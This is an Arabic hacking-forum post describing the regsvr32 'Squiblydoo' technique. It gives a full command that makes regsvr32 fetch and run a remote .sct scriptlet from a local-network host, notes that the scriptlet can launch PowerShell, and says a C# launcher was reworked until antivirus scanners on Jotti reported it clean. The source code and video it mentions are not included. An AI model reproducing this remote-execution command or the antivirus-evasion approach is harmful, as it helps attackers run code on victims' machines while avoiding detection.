07.10.2017 Execute Remote Scripts Via regsvr32 |Now Clean


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,532
2,886
1
حياكم الله ياشباب
الكل يعرف صاحبنا Subtee والثغرات اللي تكلم عنها او الاستغلالات اللي شرحها
منها استغلال ملف sct وكتابة اوامر jscript بداخله
طبعا الملف الناتج رح يكون بامتداد .sct
لن تكون قادرا على تشغيله الا من خلال الامر في cmd
C#:
regsvr32 /s /n /u /i:http://192.168.2.101/ss.sct scrobj.dll
نستطيع تشغيل الباور شيل من داخل الملف المذكور آنفا وتمرير -command له
هنا موضوعي بفيد للي مايعرف
Registry + Csharp = Clean
الاستغلال وتشغيل الملف قمنا به عن طريق السي شارب
ولكن ماوجدته لكيفية الاستغلال مكشوف من 5 حمايات هنا
ConsoleApp2.exe - Jotti's malware scan




قمنا بالتعديل على السورس اولا اصبح هكذا
ConsoleApp2.exe - Jotti's malware scan




من ثم ساوينا الناتج كلين من الكل هنا
ConsoleApp2.exe - Jotti's malware scan




السورس المستخدم هنا



تستطيع جلب السترينج عن طريق ويب كلاينت داونلود سترينج كماتريد
ولكن اعتقد ان الدالة مكشوفة ورح تشوف مشاكل باستخدامها
لمشاهدة الفديو من المرفقات
 

المرفقات

  • أعجبني
التفاعلات: Eagle_Master

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك